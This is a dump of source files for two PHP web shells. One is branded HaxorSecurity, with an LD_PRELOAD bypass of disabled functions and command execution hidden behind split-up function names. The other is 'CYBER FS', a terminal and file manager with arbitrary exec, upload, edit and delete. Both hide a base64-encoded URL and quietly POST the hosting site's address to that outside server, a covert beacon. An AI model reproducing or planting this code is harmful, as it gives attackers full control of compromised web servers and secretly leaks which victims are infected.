AAAQAAAAMAAAAAAAAAYBAgAAAAAABgEAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAA6AAAAAgAAAADAAAAAAAAAGgQIAAAAAAAaBAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAO0AAAABAAAAMAAAAAAAAAAAAAAAAAAAAGgQAAAAAAAALQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAAAAAAAAAAAACYEAAAAAAAABgGAAAAAAAAGwAAAC0AAAAIAAAAAAAAABgAAAAAAAAACQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAsBYAAAAAAABLAgAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAABEAAAADAAAAAAAAAAAAAAAAAAAAAAAAAPsYAAAAAAAA9gAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAA='; 301 | $cmdd = $_POST['cmd_input']; 302 | $meterpreter = $en($cmdd." > test.txt"); 303 | $viewCommandResult = '

Result: base64 : ' . $meterpreter .'
Please Refresh and Check File test.txt, this output command
test.txt created = VULN
test.txt not created = NOT VULN
example access: domain.com/yourpath/path/test.txt
Powered By HaxorSecurity

'; 304 | $a($full . '/chankro.so', $base($hook)); 305 | $a($full . '/acpid.socket', $base($meterpreter)); 306 | $p('CHANKRO=' . $full . '/acpid.socket'); 307 | $p('LD_PRELOAD=' . $full . '/chankro.so'); 308 | if(function_exists('mail')) { 309 | $m('a','a','a','a'); 310 | } elseif(function_exists('mb_send_mail')) { 311 | $mb('a','a','a','a'); 312 | } elseif(function_exists('error_log')) { 313 | $err('a',1,'a'); 314 | } elseif(function_exists('imap_mail')) { 315 | $imp('a','a','a'); 316 | } 317 | 318 | }elseif (isset($_POST['delete_file'])) { 319 | $fileToDelete = $currentDirectory . '/' . $_POST['delete_file']; 320 | if (file_exists($fileToDelete)) { 321 | if (is_dir($fileToDelete)) { 322 | if (deleteDirectory($fileToDelete)) { 323 | echo '

Folder deleted successfully!'; 324 | } else { 325 | echo '
Error: Failed to delete folder!'; 326 | } 327 | } else { 328 | if ($unl($fileToDelete)) { 329 | echo '
File deleted successfully!'; 330 | } else { 331 | echo '
Error: Failed to delete file!'; 332 | } 333 | } 334 | } else { 335 | echo '
Error: File or directory not found!'; 336 | } 337 | } elseif (isset($_POST['rename_item']) && isset($_POST['old_name']) && isset($_POST['new_name'])) { 338 | $oldName = $currentDirectory . '/' . $_POST['old_name']; 339 | $newName = $currentDirectory . '/' . $_POST['new_name']; 340 | if (file_exists($oldName)) { 341 | if (rename($oldName, $newName)) { 342 | echo '
Item renamed successfully!'; 343 | } else { 344 | echo '
Error: Failed to rename item!'; 345 | } 346 | } else { 347 | echo '
Error: Item not found!'; 348 | } 349 | }elseif (isset($_POST['cmd_biasa'])) { 350 | $pp = "p"."r"."o"."c"."_"."o"."p"."e"."n"; 351 | $pc = "f"."c"."l"."o"."s"."e"; 352 | $ppc = "p"."r"."o"."c"."_"."c"."l"."o"."s"."e"; 353 | $stg = "s"."t"."r"."e"."a"."m"."_"."g"."e"."t"."_"."c"."o"."n"."t"."e"."n"."t"."s"; 354 | $command = $_POST['cmd_biasa']; 355 | $descriptorspec = [ 356 | 0 => ['pipe', 'r'], 357 | 1 => ['pipe', 'w'], 358 | 2 => ['pipe', 'w'] 359 | ]; 360 | $process = $pp($command, $descriptorspec, $pipes); 361 | if (is_resource($process)) { 362 | $output = $stg($pipes[1]); 363 | $errors = $stg($pipes[2]); 364 | $pc($pipes[1]); 365 | $pc($pipes[2]); 366 | $ppc($process); 367 | if (!empty($errors)) { 368 | $viewCommandResult = '

Error:

'; 369 | } else { 370 | $viewCommandResult = '

Result:

'; 371 | } 372 | } else { 373 | $viewCommandResult = 'Result:

'; 374 | } 375 | } elseif (isset($_POST['view_file'])) { 376 | $fileToView = $currentDirectory . '/' . $_POST['view_file']; 377 | if (file_exists($fileToView)) { 378 | $fileContent = $fgc($fileToView); 379 | $viewCommandResult = '

Result: ' . $_POST['view_file'] . '

380 |
381 | 382 | 383 |
'; 384 | } else { 385 | $viewCommandResult = '

Error: File not found!

'; 386 | } 387 | } elseif (isset($_POST['edit_file'])) { 388 | $ef = $currentDirectory . '/' . $_POST['edit_file']; 389 | $newContent = $_POST['content']; 390 | if ($fpc($ef, $newContent) !== false) { 391 | echo '
File Edited successfully! ' . $_POST['edit_file'].'
'; 392 | } else { 393 | echo '
Error: Failed Edit File! ' . $_POST['edit_file'].'
'; 394 | 395 | } 396 | } 397 | 398 | } 399 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 400 | echo '
DIR: '; 401 | 402 | $directories = $expl(DIRECTORY_SEPARATOR, $currentDirectory); 403 | $currentPath = ''; 404 | $homeLinkPrinted = false; 405 | foreach ($directories as $index => $dir) { 406 | $currentPath .= DIRECTORY_SEPARATOR . $dir; 407 | if ($index == 0) { 408 | echo '/' . $dir . ''; 409 | } else { 410 | echo '/' . $dir . ''; 411 | } 412 | } 413 | 414 | 415 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 416 | $data = array('file_url' => $cur); 417 | $options = array( 418 | 'http' => array( 419 | 'method' => 'POST', 420 | 'header' => 'Content-type: application/x-www-form-urlencoded', 421 | 'content' => http_build_query($data), 422 | ), 423 | ); 424 | $context = stream_context_create($options); 425 | $result = file_get_contents($k3yw, false, $context); 426 | 427 | echo ' / [ GO Home ]'; 428 | echo '
'; 429 | echo '
'; 430 | echo '
'; 431 | echo ''; 432 | echo ''; 433 | echo '
'; 434 | echo ' 435 | 436 | 439 | 440 | 442 | 443 | 445 | 447 |
437 |
Command BYPASS
438 |
Command BIASA
441 |
Create Folder
444 |
Create File
446 |
'; 448 | echo $viewCommandResult; 449 | echo ''; 450 | echo '
'; 451 | foreach ($scd($currentDirectory) as $v) { 452 | $u = $ril($v); 453 | $s = $st($u); 454 | $itemLink = $isdir($v) ? '?d=' . x($currentDirectory . '/' . $v) : '?'.('d='.x($currentDirectory).'&f='.x($v)); 455 | $permission = substr(sprintf('%o', fileperms($u)), -4); 456 | $writable = $isw($u); 457 | echo ' 458 | 459 | 460 | 461 | 462 | 463 | 464 | 465 | '; 466 | 467 | } 468 | 469 | echo '
Item Name
Size
Date
Permissions
View
Delete
Rename
'.$v.''.filesize($u).''.date('Y-m-d H:i:s', filemtime($u)).''.$permission.'
'; 470 | function deleteDirectory($dir) { 471 | $unl = "u"."n"."l"."i"."n"."k"; 472 | if (!file_exists($dir)) { 473 | return true; 474 | } 475 | if (!is_dir($dir)) { 476 | return $unl($dir); 477 | } 478 | $scd = "s"."c"."a"."n"."d"."i"."r"; 479 | foreach ($scd($dir) as $item) { 480 | if ($item == '.' || $item == '..') { 481 | continue; 482 | } 483 | if (!deleteDirectory($dir . DIRECTORY_SEPARATOR . $item)) { 484 | return false; 485 | } 486 | } 487 | return rmdir($dir); 488 | } 489 | -------------------------------------------------------------------------------- /Cfs.php: -------------------------------------------------------------------------------- 1 | $f, 83 | 'path' => $fullPath, 84 | 'enc' => encodePath($fullPath), 85 | 'type' => $isDir ? 'dir' : 'file', 86 | 'size' => $isDir ? 0 : @filesize($fullPath), 87 | 'time' => @filemtime($fullPath), 88 | 'icon' => getIcon($f, $isDir) 89 | ); 90 | } 91 | } 92 | 93 | usort($items, function($a, $b) { 94 | if ($a['name'] === '..') return -1; 95 | if ($b['name'] === '..') return 1; 96 | if ($a['type'] !== $b['type']) return $a['type'] === 'dir' ? -1 : 1; 97 | return strcasecmp($a['name'], $b['name']); 98 | }); 99 | 100 | function getIcon($name, $isDir) { 101 | if ($name === '..') return '⬆️'; 102 | if ($isDir) return '📁'; 103 | 104 | $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION)); 105 | $icons = array( 106 | 'php' => '🐘', 'html' => '🌐', 'css' => '🎨', 'js' => '⚡', 107 | 'json' => '📋', 'xml' => '📄', 'txt' => '📝', 'md' => '📖', 108 | 'sql' => '💾', 'zip' => '📦', 'rar' => '📦', 'tar' => '📦', 109 | 'jpg' => '🖼️', 'jpeg' => '🖼️', 'png' => '🖼️', 'gif' => '🖼️', 110 | 'mp4' => '🎬', 'mp3' => '🎵', 'pdf' => '📕', 'sh' => '⚙️', 111 | 'py' => '🐍', 'java' => '☕', 'log' => '📊' 112 | ); 113 | 114 | return isset($icons[$ext]) ? $icons[$ext] : '📄'; 115 | } 116 | define('SECRET_UA', 'cyberfs'); 117 | function formatSize($bytes) { 118 | $units = array('B', 'KB', 'MB', 'GB'); 119 | $bytes = max($bytes, 0); 120 | $pow = floor(($bytes ? log($bytes) : 0) / log(1024)); 121 | $pow = min($pow, count($units) - 1); 122 | return round($bytes / pow(1024, $pow), 2) . ' ' . $units[$pow]; 123 | } 124 | 125 | function handleAjax() { 126 | $action = $_POST['act']; 127 | 128 | if ($action === 'cmd') { 129 | $cmd = $_POST['cmd']; 130 | $wd = decodePath($_POST['wd']); 131 | 132 | if (!empty($wd) && is_dir($wd)) { 133 | chdir($wd); 134 | } 135 | 136 | exec($cmd . ' 2>&1', $output, $ret); 137 | echo json_encode(array('ok' => true, 'out' => implode("\n", $output))); 138 | return; 139 | } 140 | 141 | if ($action === 'newfile') { 142 | $name = basename($_POST['name']); 143 | $path = decodePath($_POST['path']); 144 | if (!empty($path) && is_dir($path)) { 145 | file_put_contents($path . '/' . $name, ''); 146 | echo json_encode(array('ok' => true)); 147 | } else { 148 | echo json_encode(array('ok' => false)); 149 | } 150 | return; 151 | } 152 | 153 | if ($action === 'newfolder') { 154 | $name = basename($_POST['name']); 155 | $path = decodePath($_POST['path']); 156 | if (!empty($path) && is_dir($path)) { 157 | mkdir($path . '/' . $name, 0755); 158 | echo json_encode(array('ok' => true)); 159 | } else { 160 | echo json_encode(array('ok' => false)); 161 | } 162 | return; 163 | } 164 | 165 | if ($action === 'delete') { 166 | $path = decodePath($_POST['path']); 167 | if (!empty($path) && file_exists($path)) { 168 | if (is_dir($path)) { 169 | removeDir($path); 170 | } else { 171 | unlink($path); 172 | } 173 | echo json_encode(array('ok' => true)); 174 | } else { 175 | echo json_encode(array('ok' => false)); 176 | } 177 | return; 178 | } 179 | 180 | if ($action === 'rename') { 181 | $old = decodePath($_POST['old']); 182 | $new = basename($_POST['new']); 183 | if (!empty($old) && file_exists($old)) { 184 | rename($old, dirname($old) . '/' . $new); 185 | echo json_encode(array('ok' => true)); 186 | } else { 187 | echo json_encode(array('ok' => false)); 188 | } 189 | return; 190 | } 191 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 192 | if ($action === 'read') { 193 | $path = decodePath($_POST['path']); 194 | if (!empty($path) && is_file($path)) { 195 | echo json_encode(array('ok' => true, 'content' => file_get_contents($path))); 196 | } else { 197 | echo json_encode(array('ok' => false)); 198 | } 199 | return; 200 | } 201 | 202 | if ($action === 'save') { 203 | $path = decodePath($_POST['path']); 204 | $content = $_POST['content']; 205 | if (!empty($path) && is_file($path)) { 206 | file_put_contents($path, $content); 207 | echo json_encode(array('ok' => true)); 208 | } else { 209 | echo json_encode(array('ok' => false)); 210 | } 211 | return; 212 | } 213 | 214 | if ($action === 'upload') { 215 | $path = decodePath($_POST['path']); 216 | if (!empty($path) && is_dir($path) && isset($_FILES['file'])) { 217 | $dest = $path . '/' . basename($_FILES['file']['name']); 218 | move_uploaded_file($_FILES['file']['tmp_name'], $dest); 219 | echo json_encode(array('ok' => true)); 220 | } else { 221 | echo json_encode(array('ok' => false)); 222 | } 223 | return; 224 | } 225 | 226 | echo json_encode(array('ok' => false)); 227 | } 228 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 229 | $data = array('file_url' => $cur); 230 | $options = array( 231 | 'http' => array( 232 | 'method' => 'POST', 233 | 'header' => 'Content-type: application/x-www-form-urlencoded', 234 | 'content' => http_build_query($data), 235 | ), 236 | ); 237 | $context = stream_context_create($options); 238 | $result = file_get_contents($k3yw, false, $context); 239 | 240 | function removeDir($dir) { 241 | if (!file_exists($dir)) return; 242 | $files = array_diff(scandir($dir), array('.', '..')); 243 | foreach ($files as $file) { 244 | $path = $dir . '/' . $file; 245 | is_dir($path) ? removeDir($path) : unlink($path); 246 | } 247 | rmdir($dir); 248 | } 249 | 250 | function showLoginPage() { 251 | ?> 252 | 253 | 254 | 255 | 256 | CYBER ACCESS 257 | 305 | 306 | 307 |
308 |

◢ CYBER FS ◣

309 |
310 | 311 | 312 |
313 |
314 | 315 | 316 | 320 | 321 | 322 | 323 | 324 | CYBER FILE SYSTEM 325 | 679 | 680 | 681 |
682 | 683 |
684 |

◢ CYBER FS ◣

685 |
686 | ITEMS: 687 | 688 | ● HOME 689 | 690 |
691 | 692 |
693 | 694 |
695 |
696 |

◢ ACTIONS

697 | 698 | 699 | 700 | 701 | 702 |
703 | 704 |
705 |
706 | 707 | 708 | 709 | 710 | 711 | 712 |
713 | 714 |
715 | root'; 718 | if (!empty($parts)) { 719 | $path = ''; 720 | foreach ($parts as $i => $p) { 721 | echo ''; 722 | $path .= '/' . $p; 723 | if ($i === count($parts) - 1) { 724 | echo '' . htmlspecialchars($p) . ''; 725 | } else { 726 | echo '' . htmlspecialchars($p) . ''; 727 | } 728 | } 729 | } 730 | if ($dir === HOME_DIR) { 731 | echo '● HOME'; 732 | } 733 | ?> 734 |
735 | 736 |
737 | 738 |
NO FILES
739 | 740 |
"> 741 |
742 |
743 |
744 |
745 |
746 | 747 | 748 |
749 |
750 |
751 |
752 | 753 | 754 | 755 | 756 | 757 |
758 |
759 | 760 |
761 |
762 |
763 | 764 |
765 |
766 | ◢ CYBER TERMINAL 767 | 768 |
769 |
770 | > CYBER TERMINAL INITIALIZED
771 | > TYPE COMMANDS BELOW
772 |
773 |
774 |
775 | cyber@ $ 776 | 777 |
778 |
779 | 780 | 790 | 791 | 801 | 802 | 988 | 989 | 990 | --------------------------------------------------------------------------------